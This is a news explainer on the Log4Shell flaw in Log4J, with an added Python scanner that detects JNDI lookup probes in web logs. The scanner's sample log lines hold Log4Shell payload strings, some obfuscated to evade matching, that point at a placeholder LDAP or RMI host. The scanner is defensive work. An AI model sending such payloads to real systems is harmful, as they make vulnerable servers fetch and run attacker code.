The Log4Shell zeroday 4 days on. What is it and how bad is it really?



Log4Shell is the name given to a critical zeroday vulnerability that was exploited in the wild in remote-code compromises. Log4J, a logging utility used by thousands of apps, including those used inside just about every enterprise on the planet, was the source of the vulnerability. The canary in the coal mine was the Minecraft server.

It is clear that Log4Shell is a grave threat, with the list of cloud services affected reading like a who's who of the biggest names on the Internet. Threat analysts and researchers are still assessing the damage and the outlook over the next few months. Here is what you need to know.

Log4J and Log4Shell are big deals. Log4J is an open-source logging tool. It can perform network lookups using the Java Naming and Directory Interface (JNDI) to obtain services from a Lightweight Directory Access Protocol (LDAP) server. When a logged string contains such a lookup, Log4j interprets it as a URL, fetches whatever it points to, and executes it with the full privileges of the main program. Because the lookup is triggered by the ${...} syntax inside ordinary text, it can be smuggled into anything that gets logged, such as a browser user-agent string.


Here is what exploits look like.
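Added example, not from the original article: a small Python scanner that flags the `${jndi:...}` lookup in web-server log lines. It goes a step beyond the article by also unwrapping the case-folding and default-value lookup tricks that real probes used to slip past naive string matching; the log lines, hosts and addresses are constructed placeholders.

```python
import re

# Innermost Log4j lookup token: ${...} with no nested braces inside.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# What a probe has to contain once the obfuscation is peeled away.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def _resolve(m):
    """Collapse one obfuscating lookup into the literal text Log4j would produce."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):        # the real lookup: keep it visible
        return m.group(0)
    if low.startswith("lower:"):       # ${lower:J} -> j
        return body[6:].lower()
    if low.startswith("upper:"):       # ${upper:j} -> J
        return body[6:].upper()
    if ":-" in body:                   # ${::-j} or ${env:NOPE:-j} -> j (default value)
        return body.split(":-", 1)[1]
    return m.group(0)                  # e.g. ${date:yyyy}: harmless, leave as is

def normalize(text):
    """Resolve innermost lookups repeatedly until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, LOOKUP.sub(_resolve, text)
    return text

def is_log4shell_probe(line):
    return JNDI.search(normalize(line)) is not None

def scan(lines):
    """Return (1-based line number, normalized line) for every hit."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_log4shell_probe(l)]

# Constructed Apache-style access log lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:02:44 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://scanner.example/b}"',
    '203.0.113.10 - - [10/Dec/2021:13:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${env:X:-n}di:rmi://scanner.example/c}"',
    '203.0.113.11 - - [10/Dec/2021:13:04:00 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Feed real access or application log lines to scan(); a hit is a strong indicator of a scan or exploitation attempt, and the source address is worth correlating with any outbound LDAP or RMI connections the server made around that time.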

The vulnerability has a severity rating of 10 out of 10. The zeroday was exploited at least nine days before it came to light.

> The most conclusive evidence we have found so far is the Log4J exploit. It was in the wild at least 9 days before it was publicly disclosed. Don't look for evidence of mass exploitation until after public disclosure.

Matthew Prince, December 11, 2021.

The researchers at the Talos security team observed exploits.

Log4Shell surfaced last Thursday. What has happened since? Greynoise detected scanning attempts to identify vulnerable servers. Researchers report seeing this critical and easy-to-exploit vulnerability being used to install a variety of malicious software.

What is the outcome? In a best-case scenario, major brokerages, banks, and merchants will spend huge sums of overtime to get this mess under control during the holidays. You don't want to think about the worst-case scenario, other than to remember the Equifax breach and the compromise of 143 million US consumers' data that followed.

It sounds bad. What should I do? Yes, it is. If you're an end user, there's not much you can do other than hound the services you use and ask what they're doing to keep the data secure. Updating Log4J is the most useful thing the cloud services can do. It is often not that simple for large enterprises. Dozens of security companies have published guidance. Microsoft and Sophos have advice here.